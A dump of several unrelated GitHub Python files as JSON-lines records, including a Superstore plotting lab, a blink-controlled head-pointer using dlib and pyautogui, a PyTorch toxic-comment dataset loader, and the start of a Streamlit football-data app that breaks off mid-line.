43:48]\n\n# Save data set\n# np.savetxt(\"./data_sets/labels64_test.csv\", original_64_test, delimiter=',', fmt=\"%d\")\n# np.save(\"./data_sets/labels64_train.npy\", original_64_train)\n# original_64_train = np.load(\"./data_sets/labels64_train.npy\") # load the data set\n\n\n# Transform original_64 into onehot vector. ONLY for 4th order modulation!!\n# 0->[1 0 0 0], 1->[0 1 0 0], 2->[0 0 1 0], 3->[0 0 0 1]\ndef one_hot_mapping(x, num_classes=4):\n mapping_list = np.eye(num_classes)\n return mapping_list[x]\n\n\noriginal_64_onehot_test = np.array([one_hot_mapping(i) for i in original_64_test])\noriginal_64_onehot_test = original_64_onehot_test.reshape(original_64_test.shape[0], -1)\n\noriginal_64_onehot_train = np.array([one_hot_mapping(i) for i in original_64_train])\noriginal_64_onehot_train = original_64_onehot_train.reshape(original_64_train.shape[0], -1)\n\n# Save the result\n# np.save(\"./data_sets/labels64_onehot_test.npy\", original_64_onehot_test)\n# original_64_onehot_test = np.load(\"./data_sets/labels64_onehot_test.npy\") # load the data set\n# np.save(\"./data_sets/labels64_onehot_train.npy\", original_64_onehot_train)\n# original_64_onehot = np.load(\"./data_sets/labels64_onehot_train.npy\") # load the data set\n\n","repo_name":"LEON-REIN/channel_estimation","sub_path":"2.parallel_data_64.py","file_name":"2.parallel_data_64.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"79"} +{"seq_id":"41813265388","text":"#!/usr/bin/env python3\nimport shutil\nimport os\n\ndef main():\n #setting path to work from\n os.chdir('/home/student/mycode/labs/')\n \n #moving obj\n shutil.move('raynor.obj', 'ceph_storage/')\n\n #renaming file\n xname = input('What is the new name for kerrigan.obj? ')\n shutil.move('ceph_storage/kerrigan.obj', 'ceph_storage/' + xname)\n\nmain()\n","repo_name":"ejbanda/mycode","sub_path":"labs/moveplease01.py","file_name":"moveplease01.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33067913923","text":"import matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom prettytable import PrettyTable\r\nfrom matplotlib.gridspec import GridSpec\r\nsns.set_style(\"whitegrid\")\r\n\r\n# Q1.\r\ndf=pd.read_excel(\"Sample - Superstore.xls\")\r\ndf=df.drop(['Row ID', 'Order ID', 'Customer ID','Customer Name', 'Postal Code',\r\n'Product ID','Order Date', 'Ship Date', 'Country', 'Segment'], axis=1)\r\nprint(df.head().to_string())\r\n\r\n# Q2.\r\ndf_agg = df.groupby('Category').sum().reset_index()\r\nprint(df_agg)\r\nfig,ax=plt.subplots(2,2, figsize=(18,18))\r\nax[0,0].pie(x=df_agg['Sales'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0.4,0],textprops={'fontsize':30})\r\nax[0,0].set_title(\"Total sales of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[0,1].pie(x=df_agg['Quantity'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0,0.4],textprops={'fontsize':30})\r\nax[0,1].set_title(\"Total units sold of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[1,0].pie(x=df_agg['Discount'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0,0,0.4],textprops={'fontsize':30})\r\nax[1,0].set_title(\"Total discount of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nax[1,1].pie(x=df_agg['Profit'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\",explode=[0.4,0,0],textprops={'fontsize':30})\r\nax[1,1].set_title(\"Total profit of each category\",fontfamily='serif',fontsize=35,color='blue')\r\nplt.show()\r\nprint(\"In total sales plot (ax[0,0]), the maximum category is Technology and minimum category is Office supplies\")\r\nprint(\"In total quantity plot (ax[0,1]), the maximum category is Office supplies and minimum category is Technology\")\r\nprint(\"In total discount plot (ax[1,0]), the maximum category is Office supplies and minimum category is Technology\")\r\nprint(\"In total profit plot (ax[1,1]), the maximum category is Technology and minimum category is Furniture\")\r\n\r\n# Q3.\r\npt=PrettyTable()\r\npt.title=\"Super store - Category\"\r\npt.field_names=['','Sales($)','Quantity','Discount($)','Profit($)']\r\nfor i in range(len(df_agg)):\r\n row=[df_agg.loc[i,'Category'],round(df_agg.loc[i,'Sales'],2),round(df_agg.loc[i,'Quantity'],2),round(df_agg.loc[i,'Discount'],2),round(df_agg.loc[i,'Profit'],2)]\r\n pt.add_row(row)\r\nrow=['Maximum value',round(max(df_agg['Sales']),2),round(max(df_agg['Quantity']),2),round(max(df_agg['Discount']),2),round(max(df_agg['Profit']),2)]\r\npt.add_row(row)\r\nrow=['Minimum value',round(min(df_agg['Sales']),2),round(min(df_agg['Quantity']),2),round(min(df_agg['Discount']),2),round(min(df_agg['Profit']),2)]\r\npt.add_row(row)\r\nrow=['Maximum feature','Technology','Office supplies','Office supplies','Technology']\r\npt.add_row(row)\r\nrow=['Minimum feature','Office supplies','Furniture','Technology','Furniture']\r\npt.add_row(row)\r\nprint(pt)\r\n\r\n# Q4.\r\ndf_agg1=df.groupby('Sub-Category').sum().reset_index()\r\ndf_agg1=df_agg1.sort_values(by='Sales',ascending=False).iloc[:10,:]\r\nf,ax=plt.subplots(figsize=(20,8))\r\nax.bar(x=df_agg1['Sub-Category'],height=df_agg1['Sales'],width=0.4,edgecolor='blue',color='#95DEE3',label='Sales')\r\nax.plot(df_agg1['Sub-Category'],df_agg1['Profit'],color='red',linewidth=4,marker='o',label='Profit')\r\nplt.title(\"Profit and Sales per sub-category\",fontsize=30)\r\nfor i,j in zip(df_agg1['Sub-Category'],df_agg1['Sales']):\r\n if j>250000:\r\n ax.text(i,j-80000,'$'+str(round(j,2)),ha='center',va='bottom',rotation=90,fontsize=20)\r\n else:\r\n ax.text(i,j,'$'+str(round(j, 2)),ha='center',va='bottom',rotation=90,fontsize=20)\r\nax2 = ax.twinx()\r\nax.tick_params(labeltop=False,labelright=True,labelsize=20)\r\nax2.set_ylabel(\"USD($)\",fontsize=25,labelpad=70)\r\nax.set_xlabel(\"Sub_category\",fontsize=25)\r\nax.set_ylabel(\"USD($)\",fontsize=25)\r\nyticks=list(np.arange(-50000,400000,50000))\r\nax2.tick_params(labelsize=20)\r\nax.set_yticks(yticks)\r\nax2.set_yticks([])\r\nplt.grid()\r\nax.legend(bbox_to_anchor=(1.08,1.1),loc='upper right')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Q5.\r\nx = np.linspace(0, 2 * np.pi, 100) # 100 points between 0 and 2π\r\ny = np.sin(x)\r\ny_cos = np.cos(x)\r\nplt.plot(x,y,'b--',label='sine wave',linewidth=3)\r\nplt.plot(x,y_cos,'r-.',label='cosine wave',linewidth=3)\r\nplt.fill_between(x,y,y_cos,where=(y>y_cos),interpolate=True,color='green',alpha=0.3)\r\nplt.fill_between(x,y,y_cos,where=(y',color='green',ls='dashed'),\r\n fontsize=10,fontfamily='serif',weight='bold')\r\nplt.xlabel('x-axis',fontfamily='serif',fontsize=15,color='darkred')\r\nplt.ylabel('y-axis',fontfamily='serif',fontsize=15,color='darkred')\r\nplt.title('Fill between x-axis and plot line',fontfamily='serif',fontsize=20,color='blue')\r\nplt.grid(True)\r\nplt.legend(loc='lower left',prop=FontProperties(size=15))\r\nplt.xticks(fontweight='bold')\r\nplt.yticks(fontweight='bold')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Q6.\r\nx = np.linspace(-4, 4, 800)\r\ny = np.linspace(-4, 4, 800)\r\nX, Y = np.meshgrid(x, y)\r\nZ = np.sin(np.sqrt(X*X + Y*Y))\r\nfig = plt.figure(figsize=(10,10))\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(X, Y, Z, cmap='coolwarm',alpha=1,linewidth=0)\r\nax.contour(X, Y, Z, zdir='z', offset=-6, cmap='coolwarm',linewidths=1)\r\nax.contour(X, Y, Z, zdir='x', offset=-5, cmap='coolwarm',linewidths=1)\r\nax.contour(X, Y, Z, zdir='y', offset= 5, cmap='coolwarm',linewidths=1)\r\nax.set(xlim=(-5, 5), ylim=(-5, 5), zlim=(-6, 2), xlabel='X', ylabel='Y', zlabel='Z')\r\nax.set_xlabel('X Label',fontfamily='serif',fontsize=15,color='darkred')\r\nax.set_ylabel('Y Label',fontfamily='serif',fontsize=15,color='darkred')\r\nax.set_zlabel('Z Label',fontfamily='serif',fontsize=15,color='darkred')\r\n# ax.set_zticks(list(np.arange(-6,3,1)))\r\nax.set_yticks(list(np.arange(-5,6,1)))\r\nax.set_xticks(list(np.arange(-5,6,1)))\r\nax.set_title(r'Surface plot of z = sin$\\sqrt{x^2+y^2}$',fontfamily='serif',fontsize=25,color='blue')\r\n# plt.tight_layout()\r\nplt.show()\r\n\r\n# Q7.\r\nf=plt.figure(figsize=(9,7))\r\ngs=GridSpec(2,2)\r\nprint(df_agg1.head().to_string())\r\nx=np.arange(len(df_agg1['Sub-Category']))\r\nax0=plt.subplot(gs[0,:])\r\nax0.bar(x-0.2,df_agg1['Sales'],0.4,edgecolor='blue',color='#95DEE3',label='Sales')\r\nax0.bar(x+0.2,df_agg1['Profit'],0.4,edgecolor='red',color='lightcoral',label='Profit')\r\nax0.set_title(\"Sales and Profit per sub-category\",fontsize=15)\r\nax0.set_xlabel(\"Sub-Category\")\r\nax0.set_ylabel(\"USD($)\")\r\nax0.set_yticks(list(np.arange(-50000,400000,50000)))\r\nax0.set_xticks(list(x))\r\nax0.set_xticklabels(list(df_agg1['Sub-Category'].unique()))\r\nax0.tick_params(axis='x', labelsize=10) # Set the size of x-axis tick labels\r\nax0.tick_params(axis='y', labelsize=10)\r\nax0.legend()\r\n\r\nax2=plt.subplot(gs[1,0])\r\nax2.pie(x=df_agg['Sales'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\")\r\nax2.set_title('Sales',fontsize=15)\r\nax2=plt.subplot(gs[1,1])\r\nax2.pie(x=df_agg['Profit'],labels=df_agg['Category'].unique(),autopct=\"%1.2f%%\")\r\nax2.set_title('Profit',fontsize=15)\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"Ferogle/Information_Visualization","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20093807103","text":"# USAGE\n# python video_facial_landmarks.py --shape-predictor shape_predictor_68_face_landmarks.dat\n\nimport argparse\nimport time\n\nimport cv2\nimport dlib\nimport pyautogui\nfrom imutils import face_utils\n# import the necessary packages\nfrom imutils.video import VideoStream\nimport imutils\nfrom scipy.spatial import distance as dist\n\n\ndef eye_aspect_ratio(eye):\n # compute the euclidean distances between the two sets of\n # vertical eye landmarks (x, y)-coordinates\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n\n # compute the euclidean distance between the horizontal\n # eye landmark (x, y)-coordinates\n C = dist.euclidean(eye[0], eye[3])\n\n return (A + B) / (2.0 * C)\n\n\npyautogui.FAILSAFE = False\nBLINK_AR_THRESH = 0.25\nEYE_AR_CONSEC_FRAMES = 3\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n help=\"path to facial landmark predictor\")\nargs = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n# grab the indexes of the facial landmarks for the left and\n# right eye, respectively\n(left_eye_start, left_eye_end) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(right_eye_start, right_eye_end) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n\n# initialize the video stream and allow the cammera sensor to warmup\nprint(\"[INFO] camera sensor warming up...\")\nvs = VideoStream().start()\ntime.sleep(2.0)\n\nframe_count = 0\nvert_zero = 0\nhoriz_zero = 0\nvert_acc = 0\nhoriz_acc = 0\n\nblink_frame_counter = 0\ntotal_blinks = 0\n\n\n# loop over the frames from the video stream\nwhile True:\n # grab the frame from the threaded video stream, resize it to\n # have a maximum width of 400 pixels, and convert it to\n # grayscale\n frame = vs.read()\n frame = imutils.resize(frame,width= 400)\n frame_count += 1\n # frame = imutils.resize(frame, width=400)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale frame\n rects = detector(gray, 0)\n\n for rect in rects:\n\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n leftEyeCorner = shape[39]\n leftEyebrowCorner = shape[21]\n noseTop = shape[27]\n\n vertical_diff = leftEyeCorner[1] - leftEyebrowCorner[1]\n horizontal_diff = noseTop[0] - leftEyeCorner[0]\n v_diff = vert_zero - vertical_diff\n h_diff = horiz_zero - horizontal_diff\n if frame_count < 100:\n vert_acc += vertical_diff\n horiz_acc += horizontal_diff\n else:\n horiz_zero = int(horiz_acc / 100)\n vert_zero = int(vert_acc / 100)\n h_movement = 0 if abs(h_diff) < 7 else h_diff\n v_movement = 0 if abs(v_diff) < 3 else v_diff\n pyautogui.moveRel(h_movement, v_movement)\n\n left_eye = shape[left_eye_start:left_eye_end]\n right_eye = shape[right_eye_start:right_eye_end]\n ear = (eye_aspect_ratio(left_eye) + eye_aspect_ratio(right_eye)) / 2.0\n if ear < BLINK_AR_THRESH:\n blink_frame_counter += 1\n else:\n if blink_frame_counter > EYE_AR_CONSEC_FRAMES:\n # blink is detected\n total_blinks += 1\n pyautogui.click()\n blink_frame_counter = 0\n\n # loop over the (x, y)-coordinates for the facial landmarks\n # and draw them on the image\n for (x, y) in shape:\n cv2.circle(frame, (x, y), 1, (0, 0, 255), -1)\n\n # show the frame\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n","repo_name":"mflis/head-pointer","sub_path":"video_facial_landmarks.py","file_name":"video_facial_landmarks.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36925145178","text":"import pandas as pd\nimport numpy as np\nimport re\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils import data as td\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics import f1_score\n\nimport tqdm\nimport time\n\nclass ToxicTextsDataset(td.Dataset):\n def __init__(self, data_path='train.csv', \n n_train_batches=16000, \n n_test_batches=4000,\n n_valid_batches=1600,\n separate_test_and_valid=True,\n test_size=0.2,\n valid_size=0.1,\n batch_size=10, \n vocab_size=2000,\n mode='train',\n random_seed=None,\n verbose=0,\n use_cuda = True):\n \"\"\"\n INPUT:\n n_train_batches - int, number of batches to be drawn from data for training\n n_test_batches - int, number of batches to be drawn from data for testing\n n_valid_batches - int, number of batches to be drawn from data for validation\n separate_test_and_valid - bool, wherever to draw training, testing and validation \n from all data or from separated parts of data (a chance \n of intersection between training, testing and validation \n data if False)\n test_size - float from [0, 1], a portion of initial data reserved for creating \n dataset for testing. Not aplicable if separate_test_and_valid=False\n valid_size - float from [0, 1], a portion of initial data reserved for creating \n dataset for validation. Not aplicable if separate_test_and_valid=False\n batch_size - int, number of samples in one minibatch\n vocab_size - int, number of unique tokens to save and embed. Saved [vocab_size] \n most frequently encountered tokens, all others will be encoded as \n UNKNOWN token\n mode = string, one from ['train', 'test', 'valid']. Determinedes from which dataset \n will be returned sample on ToxicTextsDataset[i]\n verbose - int, 0 for no printed info, 1 for minimum info, 2 for maximum info\n \n \"\"\"\n super(ToxicTextsDataset, self).__init__()\n \n self.n_train_batches = n_train_batches\n self.n_test_batches = n_test_batches\n self.n_valid_batches = n_valid_batches\n self.separate_test_and_valid = separate_test_and_valid\n self.test_size = test_size\n self.valid_size = valid_size\n self.batch_size = batch_size\n self.vocab_size = vocab_size\n self.mode = mode\n self.verbose = verbose\n self.use_cuda = use_cuda\n \n if(random_seed != None):\n np.random.seed(random_seed)\n \n if(verbose): print('Downloading data from ' + data_path + '... ', end='')\n # read csv file\n df = pd.read_csv(data_path)\n if(verbose): print('Completed')\n \n # separate text from class labels\n X = np.array(df.iloc[:, 1])\n y = np.array(df.iloc[:, 2:])\n \n if(verbose): print('Generating vocabulary... ', end='')\n # generating vocabulary of tokens\n self.CreateTokenVocab(X, y)\n if(verbose): print('Completed')\n \n if(separate_test_and_valid == True):\n # split data for\n X_train, X, y_train, y = train_test_split(X, y, test_size=valid_size + test_size)\n \n if(verbose): print('Creating train dataset... ', end='')\n self.train_dataset = self.CreateBalancedDataset(X_train, y_train, n_train_batches)\n if(verbose): print('Completed')\n \n if(test_size != 0 and valid_size != 0):\n X_test, X_valid, y_test, y_valid = train_test_split(X, y, \n test_size=valid_size/(test_size+valid_size))\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X_test, y_test, n_test_batches)\n if(verbose): print('Completed')\n if(verbose): print('Creating validation dataset... ', end='')\n self.valid_dataset = self.CreateBalancedDataset(X_valid, y_valid, n_valid_batches)\n if(verbose): print('Completed')\n \n elif(test_size == 0):\n X_valid = X\n y_valid = y\n \n if(verbose): print('Creating validation dataset... ', end='')\n self.valid_dataset = self.CreateBalancedDataset(X_valid, y_valid, n_valid_batches)\n if(verbose): print('Completed')\n \n self.test_dataset = [] \n \n elif(valid_size == 0):\n X_test = X\n y_test = y\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X_test, y_test, n_test_batches)\n if(verbose): print('Completed')\n \n self.valid_dataset = [] \n \n elif(separate_test_and_valid == False):\n \n if(verbose): print('Creating train dataset... ', end='')\n self.train_dataset = self.CreateBalancedDataset(X, y, n_train_batches)\n if(verbose): print('Completed')\n \n if(verbose): print('Creating test dataset... ', end='')\n self.test_dataset = self.CreateBalancedDataset(X, y, n_test_batches)\n if(verbose): print('Completed')\n \n if(verbose): print('Creating validation dataset... ', end='')\n self.valid_dataset = self.CreateBalancedDataset(X, y, n_valid_batches)\n if(verbose): print('Completed')\n \n \n def encode(self, text):\n \"\"\" function that splits text into tokens and returns a list of encodings for \n each token \n INPUT: text - python string\n OUTPUT: codes - list of integers, \n cl_features - list of floats (character level features)\n \"\"\"\n tokens = self.Smart_Split(text)\n codes = []\n cl_features = self.ComputeCharacterLevelFeatures(text)\n for token in tokens:\n if(self.word_to_id.get(token) != None):\n codes.append(self.word_to_id[token])\n else:\n codes.append(self.vocab_size - 1) # UNKNOWN token\n return codes, cl_features\n \n def ComputeCharacterLevelFeatures(self, text):\n \"\"\"This function computes a character level features \n INPUT: text - a python string\n OUTPUT: cl_features - a list of floats\n \n cl_features[0] - lenght of text\n cl_features[1] - mean of lenghts of all tokens in text\n cl_features[2] - ratio of capital letters in text\n cl_features[3] - ratio of non-letter symbols in text\n \"\"\"\n text_len = float(len(text))\n \n cl_features = [\n text_len,\n np.mean([len(token) for token in self.Smart_Split(text)]),\n len(re.findall(r'[A-Z]', text)) / text_len,\n (1. - len(re.findall(r'[a-zA-Z]', text)) / text_len)\n ]\n \n return cl_features\n \n def CreateBalancedDataset(self, X, y, n_batches):\n \"\"\"This functions returns a balanced dataset (a list of batched samples with \n corresponding labels). Produced dataset is drawn with repetition from initial data, \n and therefore can contain duplicates Depending on n_batches, it will do either \n undersampling, oversampling or combination of both\n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed text \n as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels (label != 0 is assumed to be \"interesting\" )\n n_batches - integer, number of batches in dataset (so the number of samples \n in dataset is equal to n_batches * batch_size = len(dataset) * batch_size)\n OUTPUT:\n dataset - list of dictionaries where dataset[i]['input'] is a i-th batch \n of inputs and dataset[i]['labels'] - corresponding batch of labels\"\"\"\n dataset = []\n masks = self.MakeMasks(y)\n n_subbatches = n_batches // len(masks)\n \n if(self.verbose >= 2): print('\\n')\n \n for mask in masks:\n if(self.verbose >= 2): print('\\tApplying mask: ' + mask['name'] + '... ', end='')\n dataset += self.CreateDatasetFromXY(X[mask['mask']], y[mask['mask']], n_subbatches)\n if(self.verbose >= 2): print('Completed')\n \n return shuffle(dataset)\n \n def CreateDatasetFromXY(self, X, y, n_batches):\n \"\"\"\n This functions constructs and returns a dataset (a list of batched samples \n with corresponding labels). \n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed \n text as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels\n n_batches - integer, number of batches in dataset (so the number \n of samples in dataset is equal to n_batches * batch_size = \n len(dataset) * batch_size)\n OUTPUT:\n dataset - list of dictionaries where dataset[i]['input'] is a i-th \n batch of inputs and dataset[i]['labels'] - corresponding \n batch of labels\n \n \"\"\"\n # we sort our samples on the lenght of the text (in the number of tokens) and \n # place texts of the same lenght in the same position in this dictionary. \n # This can be also viewed as a hash-table\n Len_table = dict()\n for i in range(len(X)):\n codes, cl_features = self.encode(X[i])\n if(Len_table.get(len(codes)) != None):\n Len_table[len(codes)].append((codes, cl_features, y[i]))\n else: \n Len_table[len(codes)] = [(codes, cl_features, y[i])]\n \n # we have different number of samples of different lenght. There is a lot more \n # samples of lenght ~10-50 tokens and much smaller number of samples of lenght \n # 100+ tokens. Now we will get a distribution of number of samples:\n dist = np.array([[i, len(Len_table[i])] for i in Len_table.keys()])\n # here dist[i, 0] is some lenght of sample we encountered in dataset\n # and dist[i, 1] is a number of samples of that lenght \n \n p = dist[:, 1] / np.sum(dist[:, 1])\n \n # we will construct actual dataset, randomly drawing samples from that distribution:\n dataset = []\n for _ in range(n_batches):\n i = np.random.choice(dist[:, 0], p=p)\n sample_indices = np.random.randint(0, len(Len_table[i]), self.batch_size)\n # it took me some time to figure out correct transformation from mess of \n # lists and numpy array to torch tensor :)\n if(self.use_cuda):\n batch = {'input':Variable(torch.LongTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 0].tolist())), \n requires_grad=False).cuda(),\n 'cl_features':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 1].tolist())), \n requires_grad=False).cuda(),\n 'labels':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 2].tolist())), \n requires_grad=False).cuda()}\n else:\n batch = {'input':Variable(torch.LongTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 0].tolist())), \n requires_grad=False),\n 'cl_features':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 1].tolist())), \n requires_grad=False),\n 'labels':Variable(torch.FloatTensor(\n np.array(np.array(Len_table[i])[sample_indices][:, 2].tolist())), \n requires_grad=False)}\n \n dataset.append(batch) \n \n return dataset\n \n def CreateTokenVocab(self, X, y):\n '''This function generates a word_to_id dictionary we use for encoding text\n \n INPUT: X - one dimensional np.array of shappe (n_samples, ) with unparsed \n text as elements\n y - two dimensional np.array of shape (n_samples, n_labels) with \n classification labels (label != 0 is assumed to be \"interesting\" - \n we prioretize tokens encoundered in examples with at least one label = 1)\n \n '''\n token_freq = dict()\n\n # firstly we exctract all tokens we see in positivly labeled samples\n X_relevant = X[np.sum(y, axis=1) > 0] \n X_relevant += shuffle(X[np.sum(y, axis=1) == 0])[:len(X_relevant)] \n # we add random portion of \"all-negative\" data of equal size \n \n for text in X_relevant:\n tokens = self.Smart_Split(text)\n\n for token in tokens:\n if(token_freq.get(token) == None):\n token_freq[token] = 1\n else: token_freq[token] += 1\n\n tokens = sorted(token_freq, key=token_freq.get)[::-1]\n\n # secondly, we assign id's to the most frequently encountered tokens in positivly \n # classified samples\n self.word_to_id = dict()\n for i in range(self.vocab_size - 1):\n self.word_to_id[tokens[i]] = i\n\n # finally, we would like to find very similar tokens and assign to them the \n # same id (those are mainly misspells and parsing \n # innacuracies. For example 'training', 'traning', 'trainnin', 'training\"' and so on)\n vec = TfidfVectorizer()\n vec_tokens = vec.fit_transform(tokens)\n same_tokens = ((vec_tokens * vec_tokens.T) > 0.99)\n rows, cols = same_tokens.nonzero()\n\n for token_pair in zip(rows, cols):\n if(token_pair[0] > self.vocab_size):\n break\n if(token_pair[0] <= token_pair[1]):\n continue\n else:\n self.word_to_id[tokens[token_pair[1]]] = token_pair[0]\n \n def Smart_Split(self, text):\n \"\"\"Parsing function \n INPUT: text - python string with any text\n OUTPUT: list of strings, containing tokens\n \"\"\"\n out = text.strip().lower().replace('\\n', ' ')\n out = out.replace(',', ' , ').replace('.', ' . ').replace('!', ' ! ').replace('?', ' ? ')\n out = out.replace(')', ' ) ').replace('(', ' ( ').replace(':', ' : ').replace(';', ' ; ')\n return out.split()\n\n def MakeMasks(self, y):\n \"\"\"this function makes masks (bool np.arrays of length y). Each mask is \n cunstructed so that X[mask] is a part of data grouped by some combination \n of labels (for example - all data with al labels = 0, or all data with\n first class label = 1 and all other equal to 0, or all data with all \n labels equal to 1)\n INPUT: y - np.array of shape [n_samples, n_classes]\n OUTPUT: masks - list of bool np.arrays of length y\n \"\"\"\n \n def not_i_col(y, i):\n \"\"\"Utility function that returns all columns of y, except i-th\"\"\"\n mask = np.array([True, True, True, True, True, True])\n mask[i] = False\n return y[:, mask]\n\n # mask for data with label_excluded_i = 1 and all others = 0\n # important: there is no data for label_1 = 1 and all others equal to 0, \n # so skipping that mask\n mask1 = []\n for excluded_i in range(6):\n mask1.append(np.logical_and(y[:, excluded_i] == 1, \n np.sum(not_i_col(y, excluded_i), axis=1) == 0))\n\n # masks for 2, 3, 4, 5 and 6 labels respectivly equal to 1 (here we do not care, \n # which label (i.e. label_1, label_2, ...) \n # is equal to 1, just that there is exactly n=2,3,.. labels equal to 1)\n mask2 = np.sum(y, axis=1) == 2\n mask3 = np.sum(y, axis=1) == 3\n mask4 = np.sum(y, axis=1) == 4\n mask5 = np.sum(y, axis=1) == 5\n mask6 = np.sum(y, axis=1) == 6\n\n mask0 = (np.sum(y, axis=1) == 0)\n\n # let's save all masks in one list:\n masks = [{'mask':mask0, 'name':'all-negative data'}, \n {'mask':mask1[0], 'name':'only fisrt class labeled positive'},\n {'mask':mask1[2], 'name':'only third class labeled positive'},\n {'mask':mask1[3], 'name':'only fourth class labeled positive'},\n {'mask':mask1[4], 'name':'only fifth class labeled positive'},\n {'mask':mask1[5], 'name':'only sixth class labeled positive'},\n {'mask':mask2, 'name':'exactly two positive labels'},\n {'mask':mask3, 'name':'exactly three positive labels'},\n {'mask':mask4, 'name':'exactly four positive labels'},\n {'mask':mask5, 'name':'exactly five positive labels'},\n {'mask':mask6, 'name':'all-positive data'}]\n \n if(self.verbose >= 2): print('\\n\\tMasks created (a reminder - no data for \"only second class labeled positive\")', end='')\n \n return masks\n \n def __getitem__(self, i):\n if(self.mode == 'train'):\n return self.train_dataset[i]\n elif(self.mode == 'test'):\n return self.test_dataset[i]\n elif(self.mode == 'valid'):\n return self.valid_dataset[i]\n \n def __len__(self):\n if(self.mode == 'train'):\n return len(self.train_dataset)\n elif(self.mode == 'test'):\n return len(self.test_dataset)\n elif(self.mode == 'valid'):\n return len(self.valid_dataset)\n\n def shuffle(self):\n \"\"\"shuffles dataset, corresponding to current mode\"\"\"\n if(self.mode == 'train'):\n self.train_dataset = shuffle(self.train_dataset)\n elif(self.mode == 'test'):\n self.test_dataset = shuffle(self.test_dataset)\n elif(self.mode == 'valid'):\n self.valid_dataset = shuffle(self.valid_dataset)\n ","repo_name":"NikitaChizhov/ML-Project","sub_path":"ToxicTextsDataset.py","file_name":"ToxicTextsDataset.py","file_ext":"py","file_size_in_byte":19231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"29806237714","text":"import streamlit as st\r\nimport pandas as pd\r\nimport base64\r\nimport numpy as np\r\n\r\nst.title('Football Data App')\r\n#st.subheader('Data Source')\r\n#st.subheader('https://www.football-data.co.uk/')\r\n\r\nst.sidebar.header('Leagues')\r\nselected_league = st.sidebar.selectbox('League', ['England','Scotland','Germany','Italy','Spain','France','Netherlands','Belgium','Portugal','Turkey','Greece'])\r\n\r\nst.sidebar.header('Season')\r\nselected_year = st.sidebar.selectbox('Year', ['2022/2023', '2021/2022', '2020/2021', '2019/2020', '2018/2019', '2017/2018', '2016/2017', '2015/2016', '2014/2015', '2013/2014', '2012/2013', '2011/2012', '2010/2011'])\r\n\r\n# Web scraping\r\n# https://www.football-data.co.uk/mmz4281/2223/E0.csv\r\n@st.cache\r\ndef load_data(league, year):\r\n if selected_league == 'England':\r\n league = 'E0'\r\n if selected_league == 'Scotland':\r\n league = 'SC1'\r\n if selected_league == 'Germany':\r\n league = 'D1'\r\n if selected_league == 'Italy':\r\n league = 'I1'\r\n if selected_league == 'Spain':\r\n league = 'SP1'\r\n if selected_league == 'France':\r\n league = 'F1'\r\n if selected_league == 'Netherlands':\r\n league = 'N1'\r\n if selected_league == 'Belgium':\r\n league = 'B1'\r\n if selected_league == 'Portugal':\r\n league = 'P1'\r\n if selected_league == 'Turkey':\r\n league = 'T1'\r\n if selected_league == 'Greece':\r\n league = 'G1'\r\n\r\n if selected_year == '2010/2011':\r\n year = '1011'\r\n if selected_year 